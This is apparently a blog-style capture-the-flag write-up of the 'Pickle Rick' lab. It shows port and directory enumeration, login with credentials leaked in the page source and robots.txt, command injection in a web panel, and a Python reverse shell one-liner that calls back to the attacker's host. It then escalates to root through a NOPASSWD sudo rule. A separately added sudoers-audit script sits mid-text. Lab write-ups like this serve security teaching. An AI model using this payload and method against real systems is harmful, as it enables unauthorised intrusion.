root💀n16hth4wk-sec:~#

Hack Enumerate Harder! Eat. Sleep. Repeat.



First we start with an nmap scan of the target:

# Nmap 7.92 scan initiated Wed Oct 12 10:43:01 2022 as: nmap -sC -sV -T4 -oN quickmap.txt -Pn 10.10.154.17
Nmap scan report for 10.10.154.17
Host is up (0.16s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 55:7b:41:a6:7d:c5:62:13:c5:c2:af:8c:25:ae:24:b1 (RSA)
|   256 5c:c7:f0:af:79:69:38:f7:b0:94:00:6f:f2:de:5f:ba (ECDSA)
|_  256 e7:1b:43:9d:09:5d:17:e2:98:a9:a8:e7:e8:cf:9d:fb (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Rick is sup4r cool
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Oct 12 10:43:31 2022 -- 1 IP address (1 host up) scanned in 29.40 seconds

Nice, we have HTTP and SSH open. Let's enumerate port 80 first by opening the IP in our browser.


Nice, we get the homepage. It's all about Rick burping and asking us to log on to his computer to find the last 3 ingredients he needs to turn back from a pickle. Let's check the page source.


Cool, the page source gives us a username: R1ckRul3s. Let's brute-force hidden directories and files with ffuf.

┌──(n16hth4wk㉿n16hthawk-sec)-[~/Documents/THM/PickleRick]
└─$ ffuf -u "http://10.10.154.17/FUZZ" -w /usr/share/wordlists/dirb/common.txt -e .txt,.php,.phtml -fc 403 -t 40

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.5.0 Kali Exclusive <3
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.154.17/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirb/common.txt
 :: Extensions       : .txt .php .phtml 
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
 :: Filter           : Response status: 403
________________________________________________

                        [Status: 200, Size: 1062, Words: 148, Lines: 38, Duration: 196ms]
assets                  [Status: 301, Size: 313, Words: 20, Lines: 10, Duration: 178ms]
denied.php              [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 168ms]
index.html              [Status: 200, Size: 1062, Words: 148, Lines: 38, Duration: 153ms]
login.php               [Status: 200, Size: 882, Words: 89, Lines: 26, Duration: 161ms]
portal.php              [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 168ms]
robots.txt              [Status: 200, Size: 17, Words: 1, Lines: 2, Duration: 158ms]
robots.txt              [Status: 200, Size: 17, Words: 1, Lines: 2, Duration: 167ms]
:: Progress: [18456/18456] :: Job [1/1] :: 250 req/sec :: Duration: [0:01:29] :: Errors: 0 ::

Let's check robots.txt.


It contains the text "Wubbalubbadubdub" 🤔, which might be a password. Let's check portal.php.


We get redirected to login.php. Let's try logging in with the username R1ckRul3s and the potential password Wubbalubbadubdub.


Great, we're logged in. Let's try to gain a shell: portal.php gives us a command panel, so let's test it for command injection.


Great, the panel runs our input, so we have command injection. Let's prepare our reverse shell payload.

Reverse shell payload ready (10.8.12.222 is our attacking machine, 1337 the listener port):

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.8.12.222",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'

ncat listener ready on port 1337:


Let's inject the payload into the command panel.


Check the ncat listener: boom, we have a shell.


Let's stabilize the shell.


Let's escalate privileges to root. Simply running sudo -l shows that user www-data may run (ALL) NOPASSWD: ALL, i.e. any command as root without a password, on the box.
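The defender's side of that finding, as an added example that is not part of the writeup: a small Python audit that parses sudoers-style rules and flags service accounts that can run anything as root without a password, which is exactly the rule that turned the www-data shell into root here. The sample rules are constructed; only the www-data line mirrors what sudo -l reported.

```python
import re

# Constructed sample in /etc/sudoers syntax; the www-data rule is the one the writeup found.
SAMPLE_SUDOERS = """\
Defaults        env_reset
root            ALL=(ALL:ALL) ALL
%sudo           ALL=(ALL:ALL) ALL
www-data        ALL=(ALL) NOPASSWD: ALL
backup          ALL=(root) NOPASSWD: /usr/bin/rsync
"""

# Accounts that run network-facing services: the usual foothold after a web command injection.
SERVICE_ACCOUNTS = {"www-data", "apache", "nginx", "nobody", "mysql", "postgres"}

# user|%group  hosts = (runas) [TAG: ...] command, command
RULE_RE = re.compile(r"^(?P<who>\S+)\s+(?P<hosts>[^=\s]+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<spec>.+)$")
SKIP = ("Defaults", "Cmnd_Alias", "User_Alias", "Host_Alias", "Runas_Alias")


def parse_rule(line):
    """Return (who, runas, tags, commands) for one sudoers rule, else None."""
    line = line.split("#", 1)[0].strip()
    if not line or line.startswith(SKIP):
        return None
    m = RULE_RE.match(line)
    if not m:
        return None
    spec, tags = m.group("spec"), []
    while (t := re.match(r"^([A-Z]+):\s*", spec)):  # NOPASSWD:, SETENV:, ...
        tags.append(t.group(1))
        spec = spec[t.end():]
    commands = [c.strip() for c in spec.split(",")]
    return m.group("who"), m.group("runas") or "root", tags, commands


def audit_sudoers(text):
    """Return (severity, who, rule) for every password-less escalation path."""
    findings = []
    for raw in text.splitlines():
        rule = parse_rule(raw)
        if rule is None:
            continue
        who, runas, tags, commands = rule
        nopasswd = "NOPASSWD" in tags
        # runas ALL/root with command ALL is unrestricted root: what turned www-data into root here.
        unrestricted = "ALL" in commands and runas.split(":")[0] in ("ALL", "root")
        if nopasswd and unrestricted:
            findings.append(("critical" if who in SERVICE_ACCOUNTS else "high", who, raw.strip()))
        elif nopasswd and who in SERVICE_ACCOUNTS:
            findings.append(("medium", who, raw.strip()))
    return findings
```

Run it against `sudo -l` output or a copy of /etc/sudoers and /etc/sudoers.d/*; any "critical" line means a web shell is one sudo away from root.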


We are root! Let's locate the ingredients.

root@ip-10-10-197-162:/var/www/html# cat Sup3rS3cretPickl3Ingred.txt 
[redacted]
root@ip-10-10-197-162:/var/www/html# 
root@ip-10-10-197-162:/var/www/html# 
root@ip-10-10-197-162:/var/www/html# cd /home/rick/
root@ip-10-10-197-162:/home/rick# 
root@ip-10-10-197-162:/home/rick# ls
second ingredients
root@ip-10-10-197-162:/home/rick# cat "second ingredients" 
[redacted]
root@ip-10-10-197-162:/home/rick# 
root@ip-10-10-197-162:/home/rick# cd /root/
root@ip-10-10-197-162:~# 
root@ip-10-10-197-162:~# ls
3rd.txt  snap
root@ip-10-10-197-162:~# cat 3rd.txt 
[redacted]
root@ip-10-10-197-162:~# 
root@ip-10-10-197-162:~# 


We are done. Hope you had fun 😉